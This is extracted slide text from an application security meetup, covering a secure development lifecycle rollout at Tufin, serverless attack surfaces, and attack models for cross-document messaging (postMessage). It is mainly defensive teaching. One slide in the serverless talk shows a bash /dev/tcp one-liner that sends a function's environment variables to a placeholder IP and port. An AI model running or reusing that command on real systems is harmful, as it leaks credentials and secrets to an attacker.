  • 28. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 29. Security Training ● Security awareness training for the Development and QA teams  The latest security threats, mitigations, and technologies  OWASP Top 10 best practices ● Security Champions
  • 30. Security Training ● Q: How can a Security Champion be successful? ● Tip: Identify and resolve specific security issues ● Examples of investigations:  Best way for us to handle Content Security Policy (CSP)?  Best way for us to prevent XML External Entity (XXE) attack? ● Tufin success: OWASP meetup lecture https://ultimatesecurity.pro/post/xxe-meetup/
  • 31. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 32. Security Requirements ● Incorporated into the requirements stage of S/W development ● Why do we want to handle security early?  Allows us to design a feature and to write test plans which incorporate security requirements up front  Saves time for all of us – developer time, QA time, documentation time
  • 33. Design ● Designs of new features are done jointly by both development and security teams
  • 34. Security Requirements & Design ● Q: How can you ensure Dev & QA handle security? ● Tip: Make it easy - create a security checklist ● Examples  New API? • Make sure the API has proper authentication • Make sure the API has proper authorization • Implement input validation  Confidential info not stored as plain text • Use appropriate encryption or hash algorithms  Confidential info not stored on a client side  Confidential info not sent via HTTP GET method  …
  • 35. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 36. Static Application Security Testing (SAST) ● What is SAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least weekly  Daily is the best option ● Your goal: Fix High issues immediately!
  • 37. Software Updates ● All 3rd-party software is regularly updated ● Q: Can I ensure all 3rd-party software is kept up-to-date without a tool?  Open-source 3rd-party software  Commercial 3rd-party software ● Tip: check that recommended upgrades don’t introduce new vulnerabilities ● Your goal: upgrade to a version without High or Critical issues!
  • 38. Peer Reviews ● Mandatory for every code change ● Tip: ensure all code changes adhere to security requirements  Passwords are not stored in plain text  Passwords are not stored on client side  …
  • 39. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 40. Internal Security Scans ● What are Internal Security Scans? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly  Depends on your release cycle ● Your goal: Fix High issues immediately!
  • 41. Internal Security Scans ● Qualys SSL Labs Report – free service https://www.ssllabs.com/ssltest/ ● Tip: Ensure you check the “Do not show the results on the boards” checkbox
  • 43. Dynamic Application Security Testing (DAST) ● What is DAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly  Depends on your release cycle ● Your goal: Fix High issues immediately!
  • 44. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 45. External Security Tests ● Why External Security Tests? ● Tips:  Scan at least annually • Best each major release  Ensure to create a valid test scope that covers all areas • WebApp • Infra  Ensure an External Test is added into R&D calendar ● Your goal: fix High issues immediately!  Coordinate retest after your fixes
  • 46. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
  • 47. Vulnerability Response Policy • A patch will be made available as soon as possible CRITICAL HIGH MEDIUM LOW NOT VULNERABLE • A fix will be included in the upcoming release • A fix will be included in a future release • A fix may be included in a future release • Nothing to fix
  • 48. Vulnerability Response Policy ● Define a vulnerability response policy  Document it ● Tip: the policy should be approved on the corporate level  Affect sales, support, development
  • 49. Rolling out an SDL ● First phase (minimal SDL)  Vulnerability Response Policy  Internal Security Scans • Qualys SSL Labs Report  Software Updates • Using a tool ● Second Phase  External Security Tests ● Third phase  SAST ● Fourth phase  DAST
  • 50. Rolling out an SDL ● Ongoing  Security Requirements & Design  Security Training  Security Champions  Peer Reviews ● Further improvements  https://www.microsoft.com/en-us/securityengineering/sdl/practices  …
  • 51. Selecting a tool for any SDL phase ● Perform POC  Define requirements very well before the POC ● Tools can be commercial or open source ● Tools from the same provider is not essential
  • 52. How can you deliver a secure product? ● Start to roll out an SDL in your organization ● Improve SDL on a regular basis
  • 53. Take Aways SDL - the framework that ensures secure software Roll out an SDL ... And follow it!!! You will deliver a secure product!
  • 56. About Me Name Yossi Shenhav Experience CEO, Komodo Consulting Projects ctf.komodosec.com www.hacktale.com Spotlight.komodosec.com
  • 67. Code Execution Vulnerability XXE Unsafe deserialization Unsafe file opening Unsafe use of eval Vulnerable libraries
  • 68. DEPENDS ON TIMEOUT FOR OUR EXECUTION
  • 69. DEFAULT AWS SETTINGS IS 3 SECONDS
  • 72. IS IT A DEAD END?
  • 73. Application layer vulnerabilities (bad code) SQL Injection Authorization Authentication XSS and more
  • 77. PLEASE SEND YOUR ENVIRONMENT VARIABLES TO US exec 3<>/dev/tcp/<IP Address>/<port> echo "$(printenv)" 1>&3 "$(cat <&3)"
  • 79. Conclusion Application level vulnerabilities are to stay – write secure code Misconfiguration of permission in serverless application may result with attackers taking over the entire cloud environment Serverless architecture provides improved security over traditional web architecture
  • 82. Enso.security Agenda Cross-document messaging Threat and attack models The missing tool Example Takeaways
  • 83. Enso.security Application Security Virtual Meetup 2021 Live in Tel Aviv, Israel Have been breaking & building all sorts of applications since 2004 Chen Gour-Arie Chief Architect, Enso Security Exploiting cross-document messaging
  • 85. Enso.security Cross document messaging Enso.security Window to Window communication channel No network. Everything happens in the browser’s memory Simple security model The Window interface represents a window containing a DOM document; the document property points to the DOM document loaded in that window.
  • 86. Enso.security Any window in the document hierarchy can send a message to any other document The “message” event will be trigger on the receiving window. Sender window Sender document Sender script Receiver window Receiver document Receiver script Cross document messaging Functional Flow Enso.security
  • 87. Enso.security Cross document messaging Security Model Enso.security Sender code Receiver window Receiver code Sender code must specify the remote origin* Received messages include info about sender origin. Developer must authorize the call. Origin settings can tell a window to not load in risky scenarios * Wildcards can be used ** Limited browser support Cross-Origin-Opener-Policy** Cross-Origin-Embedder-Policy** X-Frame-Options Guided usage
  • 89. Enso.security Sender script Sender document window Receiver document Receiver script Spoofing: Senders aren't who we think they are. Spoofing: The recipients aren't who we think they are. Denial of Service Elevation of Privileges Tampering Information Disclosure Cross-document messaging: STRIDE
  • 90. Enso.security Receiver window Receiver document Receiver script malicious Sender window Sender script Weakness: Window may not restrict opener. Weakness: Developers can send unrestrictedly Cross-document messaging: Attack Model 1
  • 91. Enso.security Sender document Sender script Receiver window Receiver script Weakness: Window may not restrict opener. Weakness: Developers may skip authorization check Malicious page opens the victim page and sends messages to it. Sender window malicious Cross-document messaging: Attack Model 2
  • 93. Enso.security The missing tool Enso.security Find senders Should be able to: Find receivers Simulate malicious sender Simulate malicious receiver
  • 94. Enso.security Posta - open source tool at benso.io
  • 98. Enso.security Conclusion Cross document messaging weaknesses are: ● By default windows can send data to each other. ● On receiver script, there is no default authorization check. ● Sender scripts can publish data without restrictively choosing recipient. To avoid these, we must spot implementations and test them!
  • 99. Enso.security Conclusion For engineers Safe use of cross document messaging ● Use XFO/Cross Origin Policies to avoid talking to unwanted origins. ● Send to explicit targets only as in postMessage(message, [explicit target origin]) ● When handling messages, always check event.origin but beware of regex bypass techniques To avoid these, we must spot implementations and test them!
  • 100. Enso.security Omer Yaron Wix.com Barak Tawily CTO, Enso Security Research is always better with friends!
  • 101. Discover Autonomous application asset discovery Calibrate Correlate data about assets and their application security controls, backlogs, teams, project and technology - to measure risk posture Manage Rule-based policy to continuously prescribe requirements, adaptive controls, and benchmarks to assets. Enso Application Security Posture Management Thank you!